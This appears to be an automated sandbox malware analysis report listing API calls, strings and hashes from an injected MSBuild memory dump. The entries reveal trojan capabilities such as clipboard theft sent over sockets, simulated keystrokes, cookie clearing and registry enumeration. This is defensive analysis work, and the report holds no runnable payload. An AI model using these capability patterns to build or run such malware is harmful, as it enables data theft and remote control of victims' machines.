                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c66e7b394ba3cedc2256576aca990ac76a61b28af5954af531c93a6943a32a1c
                                                                                                • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                                • Opcode Fuzzy Hash: c66e7b394ba3cedc2256576aca990ac76a61b28af5954af531c93a6943a32a1c
                                                                                                • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(?,?), ref: 00452BD6
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C59
                                                                                                • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CEC
                                                                                                • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D03
                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D7F
                                                                                                • __freea.LIBCMT ref: 00452DAA
                                                                                                • __freea.LIBCMT ref: 00452DB6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                • String ID:
                                                                                                • API String ID: 201697637-0
                                                                                                • Opcode ID: 9bbe35462230cfd41bb5c244eb617c21ab0dbbd99226abfb5f91c2ba7bf60e7b
                                                                                                • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                                • Opcode Fuzzy Hash: 9bbe35462230cfd41bb5c244eb617c21ab0dbbd99226abfb5f91c2ba7bf60e7b
                                                                                                • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                • _free.LIBCMT ref: 00444714
                                                                                                • _free.LIBCMT ref: 0044472D
                                                                                                • _free.LIBCMT ref: 0044475F
                                                                                                • _free.LIBCMT ref: 00444768
                                                                                                • _free.LIBCMT ref: 00444774
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                • String ID: C
                                                                                                • API String ID: 1679612858-1037565863
                                                                                                • Opcode ID: 769349a79ca56dd22effc8d38738ceed36357cc24475ad69f0db2214bad425b5
                                                                                                • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                • Opcode Fuzzy Hash: 769349a79ca56dd22effc8d38738ceed36357cc24475ad69f0db2214bad425b5
                                                                                                • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tcp$udp
                                                                                                • API String ID: 0-3725065008
                                                                                                • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: gKE$HE$HE
                                                                                                • API String ID: 269201875-2777690135
                                                                                                • Opcode ID: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                                • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                • Opcode Fuzzy Hash: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                                • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                APIs
                                                                                                • ExitThread.KERNEL32 ref: 004017F4
                                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                • String ID: T=G$p[G$>G$>G
                                                                                                • API String ID: 1596592924-2461731529
                                                                                                • Opcode ID: 98e82c624e03c51b9ee707a6103b6063ae060d8d4c5671c370b7c60e1156fcc4
                                                                                                • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                • Opcode Fuzzy Hash: 98e82c624e03c51b9ee707a6103b6063ae060d8d4c5671c370b7c60e1156fcc4
                                                                                                • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                  • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                  • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                • String ID: .part
                                                                                                • API String ID: 1303771098-3499674018
                                                                                                • Opcode ID: 8b1ec573815bfe34844596bd28416637de36c95618f435775b88ca0a519204a1
                                                                                                • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                • Opcode Fuzzy Hash: 8b1ec573815bfe34844596bd28416637de36c95618f435775b88ca0a519204a1
                                                                                                • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                                APIs
                                                                                                  • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                  • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                  • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                • API String ID: 37874593-703403762
                                                                                                • Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                                • Opcode Fuzzy Hash: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                                                • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                                                • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                • __freea.LIBCMT ref: 00449B37
                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                • __freea.LIBCMT ref: 00449B40
                                                                                                • __freea.LIBCMT ref: 00449B65
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3864826663-0
                                                                                                • Opcode ID: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                                                                                                • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                • Opcode Fuzzy Hash: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                                                                                                • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                                APIs
                                                                                                • SendInput.USER32 ref: 00418B08
                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                                  • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InputSend$Virtual
                                                                                                • String ID:
                                                                                                • API String ID: 1167301434-0
                                                                                                • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                                • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 00415A46
                                                                                                • EmptyClipboard.USER32 ref: 00415A54
                                                                                                • CloseClipboard.USER32 ref: 00415A5A
                                                                                                • OpenClipboard.USER32 ref: 00415A61
                                                                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                • CloseClipboard.USER32 ref: 00415A89
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                • String ID:
                                                                                                • API String ID: 2172192267-0
                                                                                                • Opcode ID: 893c5a9c542433f4040ef3059124d24ea93aa08883bf4a62200d77231228e032
                                                                                                • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                • Opcode Fuzzy Hash: 893c5a9c542433f4040ef3059124d24ea93aa08883bf4a62200d77231228e032
                                                                                                • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                • Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                APIs
                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                • _free.LIBCMT ref: 00444086
                                                                                                • _free.LIBCMT ref: 0044409D
                                                                                                • _free.LIBCMT ref: 004440BC
                                                                                                • _free.LIBCMT ref: 004440D7
                                                                                                • _free.LIBCMT ref: 004440EE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$AllocateHeap
                                                                                                • String ID: J7D
                                                                                                • API String ID: 3033488037-1677391033
                                                                                                • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                                • __fassign.LIBCMT ref: 0044A180
                                                                                                • __fassign.LIBCMT ref: 0044A19B
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1324828854-0
                                                                                                • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                  • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                  • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                                • String ID: TUFTUF$>G$DG$DG
                                                                                                • API String ID: 3114080316-344394840
                                                                                                • Opcode ID: c2675298c94f2ea0f1412ba57ffa9893590e203943bb56c3b596ad0a80ec4f97
                                                                                                • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                • Opcode Fuzzy Hash: c2675298c94f2ea0f1412ba57ffa9893590e203943bb56c3b596ad0a80ec4f97
                                                                                                • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 1170836740-1018135373
                                                                                                • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                APIs
                                                                                                  • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                  • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                  • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                • API String ID: 1133728706-4073444585
                                                                                                • Opcode ID: 205fb3078b12288c199632442ed63e0e5b236c835d65a488769f7ec39f6296ef
                                                                                                • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                • Opcode Fuzzy Hash: 205fb3078b12288c199632442ed63e0e5b236c835d65a488769f7ec39f6296ef
                                                                                                • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 02717eb42979939780aa55e78abd64da983f54570bcab5d4a33c232e0763f4b4
                                                                                                • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                • Opcode Fuzzy Hash: 02717eb42979939780aa55e78abd64da983f54570bcab5d4a33c232e0763f4b4
                                                                                                • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                • int.LIBCPMT ref: 0040FC0F
                                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                • String ID: P[G
                                                                                                • API String ID: 2536120697-571123470
                                                                                                • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                APIs
                                                                                                  • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                • _free.LIBCMT ref: 0044FD29
                                                                                                  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                • _free.LIBCMT ref: 0044FD34
                                                                                                • _free.LIBCMT ref: 0044FD3F
                                                                                                • _free.LIBCMT ref: 0044FD93
                                                                                                • _free.LIBCMT ref: 0044FD9E
                                                                                                • _free.LIBCMT ref: 0044FDA9
                                                                                                • _free.LIBCMT ref: 0044FDB4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
